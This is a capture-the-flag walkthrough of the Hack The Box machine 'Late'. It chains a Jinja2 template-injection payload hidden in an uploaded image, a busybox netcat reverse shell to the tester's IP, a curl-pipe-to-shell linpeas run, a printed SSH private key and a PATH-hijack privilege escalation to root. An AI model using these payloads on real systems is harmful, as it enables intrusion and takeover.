Late

Recon

nmap_scan.log

Open 10.129.227.134:22
Open 10.129.227.134:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.134

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSqIcUZeMzG+QAl/4uYzsU98davIPkVzDmzTPOmMONUsYleBjGVwAyLHsZHhgsJqM9lmxXkb8hT4ZTTa1azg4JsLwX1xKa8m+RnXwJ1DibEMNAO0vzaEBMsOOhFRwm5IcoDR0gOONsYYfz18pafMpaocitjw8mURa+YeY21EpF6cKSOCjkVWa6yB+GT8mOcTZOZStRXYosrOqz5w7hG+20RY8OYwBXJ2Ags6HJz3sqsyT80FMoHeGAUmu+LUJnyrW5foozKgxXhyOPszMvqosbrcrsG3ic3yhjSYKWCJO/Oxc76WUdUAlcGxbtD9U5jL+LY2ZCOPva1+/kznK8FhQN
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBMen7Mjv8J63UQbISZ3Yju+a8dgXFwVLgKeTxgRc7W+k33OZaOqWBctKs8hIbaOehzMRsU7ugP6zIvYb25Kylw=
|   256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIGrWbMoMH87K09rDrkUvPUJ/ZpNAwHiUB66a/FKHWrj
80/tcp open  http    syn-ack nginx 1.14.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Domain and subdomain is disclosed from index

Writeup.png

http://images.late.htb/

Writeup-1.png

from PIL import Image, ImageDraw, ImageFont
import io
import requests

def create_text_image(text, font_path=None, background_color=None, font_size=24, padding=20, fill_color=None):
    font_path = font_path or "arial.ttf"
    background_color = background_color or (255, 255, 255) # White
    fill_color = fill_color or (0, 0, 0)                   # Black

    font = ImageFont.truetype(font_path, font_size)
    text_width = int(font.getlength(text))

    image_width = text_width + padding 
    image_height = font_size + padding * 2
    text_x = (image_width - text_width) // 2

    image = Image.new("RGB", (image_width, image_height), background_color)
    draw = ImageDraw.Draw(image)
    draw.text((text_x, padding), text, font=font, fill=fill_color)

    return image

if __name__ == '__main__':
    text = 'xx{{ cycler.__init__.__globals__.os.popen(request.args.get("LETMEIN")).read() }}'
    font_path = '/usr/local/share/fonts/CaskaydiaCoveNerdFontMono-Bold.ttf'

    image = create_text_image(
        text,
        font_size=54,
        font_path=font_path
    )
    buffer = io.BytesIO()
    image.save('text_image.png', format="PNG")
    image.save(buffer, format="PNG")
    buffer.seek(0)

    url = "http://images.late.htb/scanner" 
    files = {"file": ("letmein.png", buffer, "image/png")}
    response = requests.post(url, files=files, params={'LETMEIN': "busybox nc 10.10.14.113 4444 -e /bin/bash"})

    print(response.text[3:-4])

Note: text is updated on run, above script is after some changes.

> text = 'let me in'
< let me in

> text = '{{ cycler.__init__.__globals__.os.popen("id").read() }}'
< uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

Reverse Shell

Run above script to get a reverse shell

└─$ pwncat-cs -lp 4444
[07:15:58] Welcome to pwncat 🐈!                                                         __main__.py:164
[07:23:23] received connection from 10.129.227.134:34298                                      bind.py:84
[07:23:26] 10.129.227.134:34298: registered new host w/ db                                manager.py:957
(local) pwncat$
(remote) svc_acc@late:/home/svc_acc/app$ id
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

User.txt

(remote) svc_acc@late:/home/svc_acc/app$ cd
(remote) svc_acc@late:/home/svc_acc$ cat user.txt
5e1d660b6af7c811d3dee3ffe00a7272

Privilege Escalation

Upgrade the shell to SSH

(remote) svc_acc@late:/home/svc_acc$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----
---
└─$ nano svc.id_rsa
└─$ chmod 600 *.id_rsa
└─$ ssh -i svc.id_rsa svc_acc@late.htb

Enumerate with linpeas

svc_acc@late:~$ curl 10.10.14.113/lp.sh|sh|tee /tmp/lp.log
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root     722 Nov 16  2017 /etc/crontab
...
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/svc_acc
/run/lock
/run/screen
/run/sendmail/mta/smsocket
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
...
/usr/local/sbin
/usr/local/sbin/ssh-alert.sh
/var/crash
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/lp.log
/usr/local/sbin/ssh-alert.sh
...
/var/mail/root

So clearly there's a cronjob running ssh-alert and recipient is root, it's also probably belongs to root.

svc_acc@late:~$ cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

We have write permission in the PATH directory.

svc_acc@late:~$ echo x > /usr/local/sbin/x
svc_acc@late:~$ ls -alh /usr/local/sbin/x
-rw-rw-r-- 1 svc_acc svc_acc 2 Dec 15 12:39 /usr/local/sbin/x

svc_acc@late:~$ nano /usr/local/sbin/date
#!/bin/bash
install -m4777 /bin/bash /tmp/rootbash
svc_acc@late:~$ chmod +x /usr/local/sbin/date
---
# Trigger cronjob
└─$ ssh -i svc.id_rsa svc_acc@late.htb
---
svc_acc@late:~$ /tmp/rootbash -p
rootbash-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)

Root.txt

rootbash-4.4# cat /root/root.txt
90d9ffbcf31a52b98cf36a9d2d03868d